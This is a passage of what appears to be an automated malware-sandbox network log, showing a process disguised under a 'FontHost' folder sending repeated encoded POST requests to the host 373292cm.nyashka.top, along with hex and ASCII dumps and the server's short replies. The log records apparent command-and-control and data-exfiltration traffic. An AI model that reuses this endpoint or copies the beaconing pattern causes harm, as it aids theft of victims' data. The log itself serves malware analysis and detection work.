                              Data Raw: 09 1d 26 1f 29 1b 0c 5b 25 2b 24 54 24 0d 07 0a 2b 3d 2b 10 3d 3d 3a 00 30 38 29 17 26 2e 2b 09 30 02 3e 02 29 3d 3a 1a 26 01 09 58 2c 24 2b 5d 0c 13 22 59 20 3a 2d 04 25 12 28 1e 29 5e 3f 5d 20 3c 36 5b 29 2a 26 0a 3c 2f 23 03 28 5f 38 03 2b 14 2a 56 2f 06 0b 18 2e 33 29 0f 34 04 2b 52 0d 11 27 0f 2b 2e 31 1e 3e 3e 30 06 23 2b 23 12 33 3e 3d 08 26 1c 2a 52 26 29 24 11 32 0b 25 1f 33 57 3e 0d 25 05 3d 00 25 2f 35 12 23 22 23 54 2c 00 22 57 01 33 55 56
                              Data Ascii: &)[%+$T$+=+==:08)&.+0>)=:&X,$+]"Y :-%()^?] <6[)*&</#(_8+*V/.3)4+R'+.1>>0#+#3>=&*R&)$2%3W>%=%/5#"#T,"W3UV


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              2192.168.2.54971680.211.144.156806968C:\FontHost\NjWYKcLujkVoPzemFBeg.exe
                              TimestampBytes transferredDirectionData
                              Aug 25, 2024 15:43:31.135437965 CEST322OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                              Host: 373292cm.nyashka.top
                              Content-Length: 2504
                              Expect: 100-continue
                              Aug 25, 2024 15:43:31.491549015 CEST2504OUTData Raw: 5a 57 59 57 54 47 54 50 5b 5f 5a 51 59 5e 58 5f 57 59 5d 5e 57 5d 53 55 59 59 5f 5a 5e 5b 5a 50 5f 5e 57 51 55 5f 55 50 58 5e 59 51 50 53 51 5b 5a 5f 58 58 5d 5b 50 5c 58 5d 56 5c 52 5d 55 56 5c 5d 59 5b 50 5f 57 55 47 5a 5a 5a 47 5c 5d 5f 56 5b
                              Data Ascii: ZWYWTGTP[_ZQY^X_WY]^W]SUYY_Z^[ZP_^WQU_UPX^YQPSQ[Z_XX][P\X]V\R]UV\]Y[P_WUGZZZG\]_V[QWRY_\SQPW^]QP^Y^WP_[PT^A_Z^\^ZQX]XWXQZX_Z[TC\YWZPX[Q][\_T_IYSV[[]TXSYYUBYTX[WBRX]]\XW_XRZ^ZY]F\\Z_P^_-80;C"##V&=>?(=9?;X43!2<R+_+ 6/>&F$.Y/
                              Aug 25, 2024 15:43:31.805124044 CEST25INHTTP/1.1 100 Continue


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              3192.168.2.54971780.211.144.156806968C:\FontHost\NjWYKcLujkVoPzemFBeg.exe
                              TimestampBytes transferredDirectionData
                              Aug 25, 2024 15:43:32.522006035 CEST322OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                              Host: 373292cm.nyashka.top
                              Content-Length: 2504
                              Expect: 100-continue
                              Aug 25, 2024 15:43:32.866425991 CEST2504OUTData Raw: 5f 5c 5c 55 54 41 51 5a 5b 5f 5a 51 59 51 58 51 57 59 5d 5a 57 5e 53 54 59 59 5f 5a 5e 5b 5a 50 5f 5e 57 51 55 5f 55 50 58 5e 59 51 50 53 51 5b 5a 5f 58 58 5d 5b 50 5c 58 5d 56 5c 52 5d 55 56 5c 5d 59 5b 50 5f 57 55 47 5a 5a 5a 47 5c 5d 5f 56 5b
                              Data Ascii: _\\UTAQZ[_ZQYQXQWY]ZW^STYY_Z^[ZP_^WQU_UPX^YQPSQ[Z_XX][P\X]V\R]UV\]Y[P_WUGZZZG\]_V[QWRY_\SQPW^]QP^Y^WP_[PT^A_Z^\^ZQX]XWXQZX_Z[TC\YWZPX[Q][\_T_IYSV[[]TXSYYUBYTX[WBRX]]\XW_XRZ^ZY]F\\Z_P^_./8![$ >.,_<%]+?] <37/?("#>/.&F$.Y/=
                              Aug 25, 2024 15:43:33.188508987 CEST25INHTTP/1.1 100 Continue
                              Aug 25, 2024 15:43:33.318423033 CEST158INHTTP/1.1 200 OK
                              Server: nginx
                              Date: Sun, 25 Aug 2024 13:43:32 GMT
                              Content-Type: text/html; charset=UTF-8
                              Content-Length: 4
                              Connection: keep-alive
                              Data Raw: 3b 55 5f 5b
                              Data Ascii: ;U_[


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              4192.168.2.55985480.211.144.156806968C:\FontHost\NjWYKcLujkVoPzemFBeg.exe
                              TimestampBytes transferredDirectionData
                              Aug 25, 2024 15:43:33.497642994 CEST346OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                              Host: 373292cm.nyashka.top
                              Content-Length: 2504
                              Expect: 100-continue
                              Connection: Keep-Alive
                              Aug 25, 2024 15:43:33.850769043 CEST2504OUTData Raw: 5f 50 5c 5e 54 48 54 5e 5b 5f 5a 51 59 50 58 53 57 5d 5d 58 57 5d 53 5b 59 59 5f 5a 5e 5b 5a 50 5f 5e 57 51 55 5f 55 50 58 5e 59 51 50 53 51 5b 5a 5f 58 58 5d 5b 50 5c 58 5d 56 5c 52 5d 55 56 5c 5d 59 5b 50 5f 57 55 47 5a 5a 5a 47 5c 5d 5f 56 5b
                              Data Ascii: _P\^THT^[_ZQYPXSW]]XW]S[YY_Z^[ZP_^WQU_UPX^YQPSQ[Z_XX][P\X]V\R]UV\]Y[P_WUGZZZG\]_V[QWRY_\SQPW^]QP^Y^WP_[PT^A_Z^\^ZQX]XWXQZX_Z[TC\YWZPX[Q][\_T_IYSV[[]TXSYYUBYTX[WBRX]]\XW_XRZ^ZY]F\\Z_P^_.\;#0!-+405Y*.7(X)^+/X !1Q<#5Y/>&F$.Y/
                              Aug 25, 2024 15:43:34.179826021 CEST25INHTTP/1.1 100 Continue
                              Aug 25, 2024 15:43:34.317744017 CEST158INHTTP/1.1 200 OK
                              Server: nginx
                              Date: Sun, 25 Aug 2024 13:43:33 GMT
                              Content-Type: text/html; charset=UTF-8
                              Content-Length: 4
                              Connection: keep-alive
                              Data Raw: 3b 55 5f 5b
                              Data Ascii: ;U_[


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              5192.168.2.55985680.211.144.156806968C:\FontHost\NjWYKcLujkVoPzemFBeg.exe
                              TimestampBytes transferredDirectionData
                              Aug 25, 2024 15:43:34.469352007 CEST346OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                              Host: 373292cm.nyashka.top
                              Content-Length: 2504
                              Expect: 100-continue
                              Connection: Keep-Alive
                              Aug 25, 2024 15:43:34.869596958 CEST2504OUTData Raw: 5f 5d 59 54 51 45 51 5b 5b 5f 5a 51 59 54 58 57 57 59 5d 5d 57 59 53 5a 59 59 5f 5a 5e 5b 5a 50 5f 5e 57 51 55 5f 55 50 58 5e 59 51 50 53 51 5b 5a 5f 58 58 5d 5b 50 5c 58 5d 56 5c 52 5d 55 56 5c 5d 59 5b 50 5f 57 55 47 5a 5a 5a 47 5c 5d 5f 56 5b
                              Data Ascii: _]YTQEQ[[_ZQYTXWWY]]WYSZYY_Z^[ZP_^WQU_UPX^YQPSQ[Z_XX][P\X]V\R]UV\]Y[P_WUGZZZG\]_V[QWRY_\SQPW^]QP^Y^WP_[PT^A_Z^\^ZQX]XWXQZX_Z[TC\YWZPX[Q][\_T_IYSV[[]TXSYYUBYTX[WBRX]]\XW_XRZ^ZY]F\\Z_P^_-/3?6= "3>==/<=([77/+#1+X# 2,&F$.Y/)
                              Aug 25, 2024 15:43:35.141046047 CEST25INHTTP/1.1 100 Continue
                              Aug 25, 2024 15:43:35.274677992 CEST158INHTTP/1.1 200 OK
                              Server: nginx
                              Date: Sun, 25 Aug 2024 13:43:34 GMT
                              Content-Type: text/html; charset=UTF-8
                              Content-Length: 4
                              Connection: keep-alive
                              Data Raw: 3b 55 5f 5b
                              Data Ascii: ;U_[
                              Aug 25, 2024 15:43:35.509973049 CEST158INHTTP/1.1 200 OK
                              Server: nginx
                              Date: Sun, 25 Aug 2024 13:43:34 GMT
                              Content-Type: text/html; charset=UTF-8
                              Content-Length: 4
                              Connection: keep-alive
                              Data Raw: 3b 55 5f 5b
                              Data Ascii: ;U_[


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              6192.168.2.55985980.211.144.156806968C:\FontHost\NjWYKcLujkVoPzemFBeg.exe
                              TimestampBytes transferredDirectionData
                              Aug 25, 2024 15:43:36.210166931 CEST346OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                              Host: 373292cm.nyashka.top
                              Content-Length: 2504
                              Expect: 100-continue
                              Connection: Keep-Alive
                              Aug 25, 2024 15:43:36.569796085 CEST2504OUTData Raw: 5a 50 5c 54 54 43 54 5e 5b 5f 5a 51 59 50 58 56 57 5c 5d 5e 57 5b 53 59 59 59 5f 5a 5e 5b 5a 50 5f 5e 57 51 55 5f 55 50 58 5e 59 51 50 53 51 5b 5a 5f 58 58 5d 5b 50 5c 58 5d 56 5c 52 5d 55 56 5c 5d 59 5b 50 5f 57 55 47 5a 5a 5a 47 5c 5d 5f 56 5b
                              Data Ascii: ZP\TTCT^[_ZQYPXVW\]^W[SYYY_Z^[ZP_^WQU_UPX^YQPSQ[Z_XX][P\X]V\R]UV\]Y[P_WUGZZZG\]_V[QWRY_\SQPW^]QP^Y^WP_[PT^A_Z^\^ZQX]XWXQZX_Z[TC\YWZPX[Q][\_T_IYSV[[]TXSYYUBYTX[WBRX]]\XW_XRZ^ZY]F\\Z_P^_.8/![<" =?.=]+-#4'R 2;<7Y4*8>&F$.Y/


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              7192.168.2.55986280.211.144.156806968C:\FontHost\NjWYKcLujkVoPzemFBeg.exe
                              TimestampBytes transferredDirectionData
                              Aug 25, 2024 15:43:36.865154982 CEST346OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                              Host: 373292cm.nyashka.top
                              Content-Length: 1808
                              Expect: 100-continue
                              Connection: Keep-Alive
                              Aug 25, 2024 15:43:37.215137959 CEST1808OUTData Raw: 5f 52 5c 57 54 48 54 5a 5b 5f 5a 51 59 53 58 53 57 5a 5d 58 57 5a 53 58 59 59 5f 5a 5e 5b 5a 50 5f 5e 57 51 55 5f 55 50 58 5e 59 51 50 53 51 5b 5a 5f 58 58 5d 5b 50 5c 58 5d 56 5c 52 5d 55 56 5c 5d 59 5b 50 5f 57 55 47 5a 5a 5a 47 5c 5d 5f 56 5b
                              Data Ascii: _R\WTHTZ[_ZQYSXSWZ]XWZSXYY_Z^[ZP_^WQU_UPX^YQPSQ[Z_XX][P\X]V\R]UV\]Y[P_WUGZZZG\]_V[QWRY_\SQPW^]QP^Y^WP_[PT^A_Z^\^ZQX]XWXQZX_Z[TC\YWZPX[Q][\_T_IYSV[[]TXSYYUBYTX[WBRX]]\XW_XRZ^ZY]F\\Z_P^_.,/!Y 9>0_+6)=##V#8Q<97#%_;>&F$.Y/5
                              Aug 25, 2024 15:43:37.550293922 CEST25INHTTP/1.1 100 Continue
                              Aug 25, 2024 15:43:37.681351900 CEST308INHTTP/1.1 200 OK
                              Server: nginx
                              Date: Sun, 25 Aug 2024 13:43:37 GMT
                              Content-Type: text/html; charset=UTF-8
                              Content-Length: 152
                              Connection: keep-alive
                              Data Raw: 09 1d 26 57 28 26 3e 5a 26 5d 38 54 27 30 3e 10 2b 3d 20 06 3e 2e 31 17 25 38 35 58 27 3e 33 08 33 2b 32 04 2b 2d 36 14 25 06 20 00 39 0e 2b 5d 0c 13 22 5f 34 04 2d 04 25 12 3f 04 2a 28 01 5f 21 2f 25 02 29 2a 22 0d 3e 2c 2c 58 2b 39 2c 00 28 04 25 0c 38 06 2d 5e 2d 09 32 1e 34 04 2b 52 0d 11 24 56 29 2d 32 0e 2a 3e 1a 04 35 5e 24 03 27 5b 39 0f 32 32 29 0c 30 00 30 12 25 22 21 56 25 32 35 50 25 3b 35 02 25 2f 3a 0f 21 32 23 54 2c 00 22 57 01 33 55 56
                              Data Ascii: &W(&>Z&]8T'0>+= >.1%85X'>33+2+-6% 9+]"_4-%?*(_!/%)*">,,X+9,(%8-^-24+R$V)-2*>5^$'[922)00%"!V%25P%;5%/:!2#T,"W3UV


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              8192.168.2.55986480.211.144.156806968C:\FontHost\NjWYKcLujkVoPzemFBeg.exe
                              TimestampBytes transferredDirectionData
                              Aug 25, 2024 15:43:38.061762094 CEST324OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                              Host: 373292cm.nyashka.top
                              Content-Length: 134140
                              Expect: 100-continue


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              9192.168.2.55986580.211.144.156806968C:\FontHost\NjWYKcLujkVoPzemFBeg.exe
                              TimestampBytes transferredDirectionData
                              Aug 25, 2024 15:43:38.164678097 CEST346OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                              Host: 373292cm.nyashka.top
                              Content-Length: 2504
                              Expect: 100-continue
                              Connection: Keep-Alive
                              Aug 25, 2024 15:43:38.522892952 CEST2504OUTData Raw: 5f 52 5c 5f 54 49 51 5a 5b 5f 5a 51 59 5e 58 56 57 58 5d 5c 57 50 53 55 59 59 5f 5a 5e 5b 5a 50 5f 5e 57 51 55 5f 55 50 58 5e 59 51 50 53 51 5b 5a 5f 58 58 5d 5b 50 5c 58 5d 56 5c 52 5d 55 56 5c 5d 59 5b 50 5f 57 55 47 5a 5a 5a 47 5c 5d 5f 56 5b
                              Data Ascii: _R\_TIQZ[_ZQY^XVWX]\WPSUYY_Z^[ZP_^WQU_UPX^YQPSQ[Z_XX][P\X]V\R]UV\]Y[P_WUGZZZG\]_V[QWRY_\SQPW^]QP^Y^WP_[PT^A_Z^\^ZQX]XWXQZX_Z[TC\YWZPX[Q][\_T_IYSV[[]TXSYYUBYTX[WBRX]]\XW_XRZ^ZY]F\\Z_P^_._83"-$" 1X+-<X6).'Y7# R*)7Y7;.&F$.Y/
                              Aug 25, 2024 15:43:38.846167088 CEST25INHTTP/1.1 100 Continue
                              Aug 25, 2024 15:43:38.977768898 CEST158INHTTP/1.1 200 OK
                              Server: nginx
                              Date: Sun, 25 Aug 2024 13:43:38 GMT
                              Content-Type: text/html; charset=UTF-8
                              Content-Length: 4
                              Connection: keep-alive
                              Data Raw: 3b 55 5f 5b
                              Data Ascii: ;U_[


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              10192.168.2.55986680.211.144.156806968C:\FontHost\NjWYKcLujkVoPzemFBeg.exe
                              TimestampBytes transferredDirectionData
                              Aug 25, 2024 15:43:39.197925091 CEST322OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                              Host: 373292cm.nyashka.top
                              Content-Length: 2504
                              Expect: 100-continue
                              Aug 25, 2024 15:43:39.553985119 CEST2504OUTData Raw: 5f 55 59 54 54 40 54 51 5b 5f 5a 51 59 51 58 55 57 5d 5d 5b 57 5e 53 55 59 59 5f 5a 5e 5b 5a 50 5f 5e 57 51 55 5f 55 50 58 5e 59 51 50 53 51 5b 5a 5f 58 58 5d 5b 50 5c 58 5d 56 5c 52 5d 55 56 5c 5d 59 5b 50 5f 57 55 47 5a 5a 5a 47 5c 5d 5f 56 5b
                              Data Ascii: _UYTT@TQ[_ZQYQXUW]][W^SUYY_Z^[ZP_^WQU_UPX^YQPSQ[Z_XX][P\X]V\R]UV\]Y[P_WUGZZZG\]_V[QWRY_\SQPW^]QP^Y^WP_[PT^A_Z^\^ZQX]XWXQZX_Z[TC\YWZPX[Q][\_T_IYSV[[]TXSYYUBYTX[WBRX]]\XW_XRZ^ZY]F\\Z_P^_-83#-3# 6>-4^+-=]('#,#"#?* #]8&F$.Y/=
                              Aug 25, 2024 15:43:39.867302895 CEST25INHTTP/1.1 100 Continue
                              Aug 25, 2024 15:43:40.066488981 CEST158INHTTP/1.1 200 OK
                              Server: nginx
                              Date: Sun, 25 Aug 2024 13:43:39 GMT
                              Content-Type: text/html; charset=UTF-8
                              Content-Length: 4
                              Connection: keep-alive
                              Data Raw: 3b 55 5f 5b
                              Data Ascii: ;U_[


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              11192.168.2.55986780.211.144.156806968C:\FontHost\NjWYKcLujkVoPzemFBeg.exe
                              TimestampBytes transferredDirectionData
                              Aug 25, 2024 15:43:40.612499952 CEST322OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                              Host: 373292cm.nyashka.top
                              Content-Length: 2504
                              Expect: 100-continue
                              Aug 25, 2024 15:43:40.960154057 CEST2504OUTData Raw: 5a 57 59 54 54 40 51 5b 5b 5f 5a 51 59 5f 58 56 57 5a 5d 58 57 51 53 5c 59 59 5f 5a 5e 5b 5a 50 5f 5e 57 51 55 5f 55 50 58 5e 59 51 50 53 51 5b 5a 5f 58 58 5d 5b 50 5c 58 5d 56 5c 52 5d 55 56 5c 5d 59 5b 50 5f 57 55 47 5a 5a 5a 47 5c 5d 5f 56 5b
                              Data Ascii: ZWYTT@Q[[_ZQY_XVWZ]XWQS\YY_Z^[ZP_^WQU_UPX^YQPSQ[Z_XX][P\X]V\R]UV\]Y[P_WUGZZZG\]_V[QWRY_\SQPW^]QP^Y^WP_[PT^A_Z^\^ZQX]XWXQZX_Z[TC\YWZPX[Q][\_T_IYSV[[]TXSYYUBYTX[WBRX]]\XW_XRZ^ZY]F\\Z_P^_-.3#-7#V)==<\+5^?=Y ?4#!,R+98"#>8&F$.Y/
                              Aug 25, 2024 15:43:41.302401066 CEST25INHTTP/1.1 100 Continue
                              Aug 25, 2024 15:43:41.435739040 CEST158INHTTP/1.1 200 OK
                              Server: nginx
                              Date: Sun, 25 Aug 2024 13:43:40 GMT
                              Content-Type: text/html; charset=UTF-8
                              Content-Length: 4
                              Connection: keep-alive
                              Data Raw: 3b 55 5f 5b
                              Data Ascii: ;U_[


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              12192.168.2.55986880.211.144.156806968C:\FontHost\NjWYKcLujkVoPzemFBeg.exe
                              TimestampBytes transferredDirectionData
                              Aug 25, 2024 15:43:41.563036919 CEST322OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                              Host: 373292cm.nyashka.top
                              Content-Length: 2504
                              Expect: 100-continue
                              Aug 25, 2024 15:43:41.913486958 CEST2504OUTData Raw: 5a 50 5c 57 54 45 54 51 5b 5f 5a 51 59 51 58 5f 57 5b 5d 53 57 5d 53 5e 59 59 5f 5a 5e 5b 5a 50 5f 5e 57 51 55 5f 55 50 58 5e 59 51 50 53 51 5b 5a 5f 58 58 5d 5b 50 5c 58 5d 56 5c 52 5d 55 56 5c 5d 59 5b 50 5f 57 55 47 5a 5a 5a 47 5c 5d 5f 56 5b
                              Data Ascii: ZP\WTETQ[_ZQYQX_W[]SW]S^YY_Z^[ZP_^WQU_UPX^YQPSQ[Z_XX][P\X]V\R]UV\]Y[P_WUGZZZG\]_V[QWRY_\SQPW^]QP^Y^WP_[PT^A_Z^\^ZQX]XWXQZX_Z[TC\YWZPX[Q][\_T_IYSV[[]TXSYYUBYTX[WBRX]]\XW_XRZ^ZY]F\\Z_P^_.\//@5"0X>=?!\?/#+P $*)#406.>&F$.Y/=
                              Aug 25, 2024 15:43:42.237765074 CEST25INHTTP/1.1 100 Continue
                              Aug 25, 2024 15:43:42.367547035 CEST158INHTTP/1.1 200 OK
                              Server: nginx
                              Date: Sun, 25 Aug 2024 13:43:41 GMT
                              Content-Type: text/html; charset=UTF-8
                              Content-Length: 4
                              Connection: keep-alive
                              Data Raw: 3b 55 5f 5b
                              Data Ascii: ;U_[


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              13192.168.2.55986980.211.144.156806968C:\FontHost\NjWYKcLujkVoPzemFBeg.exe
                              TimestampBytes transferredDirectionData
                              Aug 25, 2024 15:43:42.495603085 CEST322OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                              Host: 373292cm.nyashka.top
                              Content-Length: 2504
                              Expect: 100-continue


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              14192.168.2.55987080.211.144.156806968C:\FontHost\NjWYKcLujkVoPzemFBeg.exe
                              TimestampBytes transferredDirectionData
                              Aug 25, 2024 15:43:42.743825912 CEST346OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                              Host: 373292cm.nyashka.top
                              Content-Length: 1828
                              Expect: 100-continue
                              Connection: Keep-Alive
                              Aug 25, 2024 15:43:43.117718935 CEST1828OUTData Raw: 5f 56 5c 54 54 41 54 5a 5b 5f 5a 51 59 52 58 56 57 5d 5d 5b 57 5d 53 54 59 59 5f 5a 5e 5b 5a 50 5f 5e 57 51 55 5f 55 50 58 5e 59 51 50 53 51 5b 5a 5f 58 58 5d 5b 50 5c 58 5d 56 5c 52 5d 55 56 5c 5d 59 5b 50 5f 57 55 47 5a 5a 5a 47 5c 5d 5f 56 5b
                              Data Ascii: _V\TTATZ[_ZQYRXVW]][W]STYY_Z^[ZP_^WQU_UPX^YQPSQ[Z_XX][P\X]V\R]UV\]Y[P_WUGZZZG\]_V[QWRY_\SQPW^]QP^Y^WP_[PT^A_Z^\^ZQX]XWXQZX_Z[TC\YWZPX[Q][\_T_IYSV[[]TXSYYUBYTX[WBRX]]\XW_XRZ^ZY]F\\Z_P^_.,$!; %[* Y(=]?/] </ #<?\ >.>&F$.Y/1
                              Aug 25, 2024 15:43:43.418952942 CEST25INHTTP/1.1 100 Continue
                              Aug 25, 2024 15:43:43.551611900 CEST308INHTTP/1.1 200 OK
                              Server: nginx
                              Date: Sun, 25 Aug 2024 13:43:42 GMT
                              Content-Type: text/html; charset=UTF-8
                              Content-Length: 152
                              Connection: keep-alive
                              Data Raw: 09 1d 26 11 29 25 03 01 26 3b 2c 51 24 0a 3e 56 2a 03 28 02 2a 2d 0b 1a 24 06 3e 00 27 3e 3c 1d 33 02 21 5a 28 2e 2a 1b 31 06 23 11 2d 24 2b 5d 0c 13 22 16 37 04 08 1e 25 2f 30 5b 29 5e 28 02 21 2c 0c 5d 3c 2a 31 52 3e 2c 3c 59 3c 39 0a 02 3c 5c 3d 0b 2c 01 3d 18 2f 33 2d 0c 37 2e 2b 52 0d 11 24 1e 3c 2d 04 0c 3e 3e 33 5f 21 2b 24 03 26 2d 03 0e 32 0c 03 0e 26 3a 3f 05 25 0c 31 50 27 22 3a 0d 25 3b 22 1c 32 2c 26 0f 23 32 23 54 2c 00 22 57 01 33 55 56
                              Data Ascii: &)%&;,Q$>V*(*-$>'><3!Z(.*1#-$+]"7%/0[)^(!,]<*1R>,<Y<9<\=,=/3-7.+R$<->>3_!+$&-2&:?%1P'":%;"2,&#2#T,"W3UV


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              15192.168.2.55987180.211.144.156806968C:\FontHost\NjWYKcLujkVoPzemFBeg.exe
                              TimestampBytes transferredDirectionData
                              Aug 25, 2024 15:43:43.203946114 CEST346OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                              Host: 373292cm.nyashka.top
                              Content-Length: 2504
                              Expect: 100-continue
                              Connection: Keep-Alive
                              Aug 25, 2024 15:43:43.553869963 CEST2504OUTData Raw: 5a 56 5c 53 51 44 54 58 5b 5f 5a 51 59 5e 58 5e 57 59 5d 5f 57 5c 53 58 59 59 5f 5a 5e 5b 5a 50 5f 5e 57 51 55 5f 55 50 58 5e 59 51 50 53 51 5b 5a 5f 58 58 5d 5b 50 5c 58 5d 56 5c 52 5d 55 56 5c 5d 59 5b 50 5f 57 55 47 5a 5a 5a 47 5c 5d 5f 56 5b
                              Data Ascii: ZV\SQDTX[_ZQY^X^WY]_W\SXYY_Z^[ZP_^WQU_UPX^YQPSQ[Z_XX][P\X]V\R]UV\]Y[P_WUGZZZG\]_V[QWRY_\SQPW^]QP^Y^WP_[PT^A_Z^\^ZQX]XWXQZX_Z[TC\YWZPX[Q][\_T_IYSV[[]TXSYYUBYTX[WBRX]]\XW_XRZ^ZY]F\\Z_P^_.Y.#'E68705[=<>=>?84?/P4!?*:'"#6;.&F$.Y/
                              Aug 25, 2024 15:43:44.014553070 CEST25INHTTP/1.1 100 Continue
                              Aug 25, 2024 15:43:44.014612913 CEST158INHTTP/1.1 200 OK
                              Server: nginx
                              Date: Sun, 25 Aug 2024 13:43:43 GMT
                              Content-Type: text/html; charset=UTF-8
                              Content-Length: 4
                              Connection: keep-alive
                              Data Raw: 3b 55 5f 5b
                              Data Ascii: ;U_[


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              16192.168.2.55987280.211.144.156806968C:\FontHost\NjWYKcLujkVoPzemFBeg.exe
                              TimestampBytes transferredDirectionData
                              Aug 25, 2024 15:43:44.137904882 CEST322OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                              Host: 373292cm.nyashka.top
                              Content-Length: 2504
                              Expect: 100-continue
                              Aug 25, 2024 15:43:44.491388083 CEST2504OUTData Raw: 5a 57 59 53 54 45 51 59 5b 5f 5a 51 59 5e 58 51 57 51 5d 52 57 5e 53 5f 59 59 5f 5a 5e 5b 5a 50 5f 5e 57 51 55 5f 55 50 58 5e 59 51 50 53 51 5b 5a 5f 58 58 5d 5b 50 5c 58 5d 56 5c 52 5d 55 56 5c 5d 59 5b 50 5f 57 55 47 5a 5a 5a 47 5c 5d 5f 56 5b
                              Data Ascii: ZWYSTEQY[_ZQY^XQWQ]RW^S_YY_Z^[ZP_^WQU_UPX^YQPSQ[Z_XX][P\X]V\R]UV\]Y[P_WUGZZZG\]_V[QWRY_\SQPW^]QP^Y^WP_[PT^A_Z^\^ZQX]XWXQZX_Z[TC\YWZPX[Q][\_T_IYSV[[]TXSYYUBYTX[WBRX]]\XW_XRZ^ZY]F\\Z_P^_-,3"- )])3+>>(]"?342$<9"#!Y,>&F$.Y/
                              Aug 25, 2024 15:43:44.806468010 CEST25INHTTP/1.1 100 Continue
                              Aug 25, 2024 15:43:44.934180975 CEST158INHTTP/1.1 200 OK
                              Server: nginx
                              Date: Sun, 25 Aug 2024 13:43:44 GMT
                              Content-Type: text/html; charset=UTF-8
                              Content-Length: 4
                              Connection: keep-alive
                              Data Raw: 3b 55 5f 5b
                              Data Ascii: ;U_[


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
